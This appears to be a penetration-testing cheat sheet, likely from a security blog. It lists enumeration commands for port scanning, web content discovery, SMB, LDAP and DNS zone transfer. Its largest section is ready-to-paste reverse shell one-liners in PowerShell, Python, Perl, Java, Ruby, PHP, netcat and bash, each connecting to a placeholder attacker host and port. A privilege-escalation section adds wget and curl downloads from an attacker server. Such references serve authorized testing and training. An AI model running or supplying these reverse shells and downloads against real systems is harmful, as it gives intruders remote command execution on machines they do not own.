Pentest Cheat Sheet

  1. Passive Scan
  2. Enumeration
  3. Exploitation
  4. Reverse Shells
  5. Priviledge Escalation

Enumeration

Masscan & Nmap

A great mix of nmap and masscan.

1
2
3
4
masscan -p1-65535,U:1-65535 127.0.0.1 --rate=1000 -p1-65535,U:1-65535 -i tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n'
',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports 127.0.0.1

Masscan

1
2
3
4
5
6
7
8
9
10
-p     = ports
U: = udp scan
-i = interface
-vv = verbosity
--rate = basically scan speed
-oG = "o" stands for output and "G" stands for "Grepable" so i prefer to use it

# I generally start with this
masscan -p0-65535 -i tun0 -vv 127.0.0.1 --rate 1000 -oG masscan/masscan.tcp
masscan -pU:0-65535 -i tun0 -vv 127.0.0.1 --rate 1000 -oG masscan/masscan.udp

Nmap

1
2
3
4
5
6
7
8
9
-sV           = enumerate versions
-sC = default script scan
-vv = verbosity
-o = output directory
-T5 = aggresive scan
--script vuln = vulnerable script scan

-p1-65534 = all ports
nmap -sV -sC -vv -o nmap/nmap 127.0.0.1

Web Content Discovery

1
2
3
4
5
6
wfuzz -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -H "Host: localhost" --hw 91 http://127.0.0.1/vuln.php?cmd=FUZZ

# -k flag is ignore ssl handshake
gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://127.0.0.1 -t 20 -x php~,html,txt,php -s 200,204,301,302,307,401,403

nikto -h morph3sec.com

SMB

1
2
3
4
5
6
7
#To list all shares
#-N is null share
smbclient -N -L \\\\127.0.0.1\\
smbcacls -N "//127.0.0.1" /Users
# smbmap gives really good info about shares
smbmap -u morph3 -p pass1234 -d ECORP -H 127.0.0.1
smbmap -u invaliduser 127.0.0.1

LDAP

1
2
3
#initial
ldapsearch -x -h domain.name -s base namingcontexts
ldapsearch -x -h domain.name -s sub -b 'DC=DOMAIN,DC=NAME'

DNS Zone Transfer

1
dig axfr @TheDNSServerYouWanToAsk domain

Exploitation

Spawning TTY Shell

1
2
3
4
python -c 'import pty; pty.spawn("/bin/sh")'
ctrl+z --> background it
stty raw -echo
nc -nvlp 4444

Searchsploit

1
searchsploit exploitName

Reverse Shells

Powershell

1
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',ATTACKER_PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Python

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",ATTACKER_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Perl

1
perl -e use Socket;$i = "ATTACKER_IP";$p = ATTACKER_PORT;socket(S, PF_INET, SOCK_STREAM,getprotobyname("tcp"));if (connect(S, sockaddr_in($p, inet_aton($i)))) {open(STDIN,  ">&S");open(STDOUT, ">&S");open(STDERR, ">&S");exec("/bin/sh -i");}

Java

1
2
3
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKER_IP/ATTACKER_PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Ruby

1
ruby -rsocket -e'f=TCPSocket.open("ATTACKER_IP",ATTACKER_PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PHP

1
php -r '$sock=fsockopen("ATTACKER_IP",ATTACKER_PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

netcat

1
nc -e /bin/sh ATTACKER_IP ATTACKER_PORT

bash

1
bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1

Priv Esc

wget

1
wget http://ATTACKER_SERVER/example.txt -O example.txt

cURL

1
curl http://ATTACKER_SERVER/example.txt -o example.txt

Linux Priv Esc

Searching

Searching for a file with a name pattern

1
find / -name "*pattern*"

Recursive string scan

1
grep -rnw '/path/to/somewhere/' -e 'pattern'